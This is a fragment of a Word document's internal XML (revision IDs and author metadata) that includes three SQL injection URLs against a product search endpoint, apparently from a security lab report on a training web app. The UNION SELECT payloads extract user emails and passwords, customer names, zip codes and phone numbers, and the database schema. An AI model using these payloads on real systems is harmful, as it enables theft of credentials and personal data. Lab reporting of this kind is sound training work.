    <w:rsid w:val="00690561"/>
    <w:rsid w:val="0069169C"/>
    <w:rsid w:val="006A6992"/>
    <w:rsid w:val="006C4B3C"/>
    <w:rsid w:val="006F0B5E"/>
    <w:rsid w:val="006F47EF"/>
    <w:rsid w:val="00701504"/>
    <w:rsid w:val="00707C1B"/>
    <w:rsid w:val="00727250"/>
    <w:rsid w:val="007317BB"/>
    <w:rsid w:val="00734CFD"/>
    <w:rsid w:val="00745A56"/>
    <w:rsid w:val="00750835"/>
    <w:rsid w:val="00753727"/>
    <w:rsid w:val="00765178"/>
    <w:rsid w:val="00795E9B"/>
    <w:rsid w:val="007A4418"/>
    <w:rsid w:val="007B6E63"/>
    <w:rsid w:val="007E1190"/>
    <w:rsid w:val="00800212"/>
    <w:rsid w:val="00810B31"/>
    <w:rsid w:val="00866FDB"/>
    <w:rsid w:val="008747BD"/>
    <w:rsid w:val="00884465"/>
    <w:rsid w:val="008A45E9"/>
    <w:rsid w:val="008B1E05"/>
    <w:rsid w:val="0090221E"/>
    <w:rsid w:val="00914DF1"/>
    <w:rsid w:val="00916FD9"/>
    <w:rsid w:val="009467FD"/>
    <w:rsid w:val="009636A3"/>
    <w:rsid w:val="009648D5"/>
    <w:rsid w:val="009770FE"/>
    <w:rsid w:val="009774BC"/>
    <w:rsid w:val="00983FDD"/>
    <w:rsid w:val="00991AF4"/>
    <w:rsid w:val="009B145C"/>
    <w:rsid w:val="009B4240"/>
    <w:rsid w:val="009C3B3C"/>
    <w:rsid w:val="009F1ED6"/>
    <w:rsid w:val="009F21F0"/>
    <w:rsid w:val="00A04B61"/>
    <w:rsid w:val="00A16EAE"/>
    <w:rsid w:val="00A30F3B"/>
    <w:rsid w:val="00A90EC7"/>
    <w:rsid w:val="00B90A32"/>
    <w:rsid w:val="00C04D06"/>
    <w:rsid w:val="00C061C7"/>
    <w:rsid w:val="00C90F76"/>
    <w:rsid w:val="00CA6038"/>
    <w:rsid w:val="00D05E41"/>
    <w:rsid w:val="00D150FA"/>
    <w:rsid w:val="00D15BF6"/>
    <w:rsid w:val="00D33C3B"/>
    <w:rsid w:val="00D7267E"/>
    <w:rsid w:val="00D80852"/>
    <w:rsid w:val="00D93624"/>
    <w:rsid w:val="00DD5DE0"/>
    <w:rsid w:val="00DF373A"/>
    <w:rsid w:val="00DF3B97"/>
    <w:rsid w:val="00DF66EE"/>
    <w:rsid w:val="00E1324B"/>
    <w:rsid w:val="00E14799"/>
    <w:rsid w:val="00E251D8"/>
    <w:rsid w:val="00E435B6"/>
    <w:rsid w:val="00E5221E"/>
    <w:rsid w:val="00E61CDF"/>
    <w:rsid w:val="00E728CC"/>
    <w:rsid w:val="00ED18D3"/>
    <w:rsid w:val="00ED7C4A"/>
    <w:rsid w:val="00EF542E"/>
    <w:rsid w:val="00EF6A5B"/>
    <w:rsid w:val="00F25CC6"/>
    <w:rsid w:val="00F33946"/>
    <w:rsid w:val="00F4131D"/>
    <w:rsid w:val="00F9732C"/>
    <w:rsid w:val="00FA1547"/>
    <w:rsid w:val="00FB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EB27"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B215F312-1D84-4678-B67E-32FF3FBA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B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D18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8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rest/products/search?q=apple%20pom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rest/products/search?q=xyz'))%20UNION%20SELECT%20email,%20password,%20'3',%20'4',%20'5',%20'6',%20'7',%20'8',%20'9'%20FROM%20users-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rest/products/search?q=%27))%20UNION%20SELECT%20fullName,zipCode,mobileNum,4,5,6,7,8,9%20FROM%20Addresses--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rest/products/search?q=%27))%20UNION%20SELECT%20sql,2,3,4,5,6,7,8,9%20FROM%20sqlite_master-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1517</Words>
  <Characters>8652</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>72</Lines>
  <Paragraphs>20</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Akruti Sinha</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Akruti Sinha</cp:lastModifiedBy>
  <cp:revision>134</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-26T04:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-20T22:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>